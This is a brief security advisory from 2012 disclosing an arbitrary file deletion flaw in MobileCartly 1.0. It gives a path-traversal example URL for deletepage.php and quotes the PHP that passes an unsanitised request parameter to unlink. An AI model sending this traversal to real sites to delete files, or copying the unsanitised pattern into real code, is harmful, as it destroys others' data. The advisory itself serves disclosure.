|
|
| |
| MobileCartly 1.0 Arbitrary suffers from file deletion vulnerability |
| |
Credit:
The information has been provided by GoLd_M.
|
| |
Vulnerable Systems:
* MobileCartly 1.0
Ex : [MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File]
# Code Page /includes/deletepage.php
# <?
#
# $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX
#
# unlink($page); <<---XXX[Booooom]
#
#
# ?>
Disclosure Timeline:
Published: 2012-08-10
|
|
blog comments powered by
|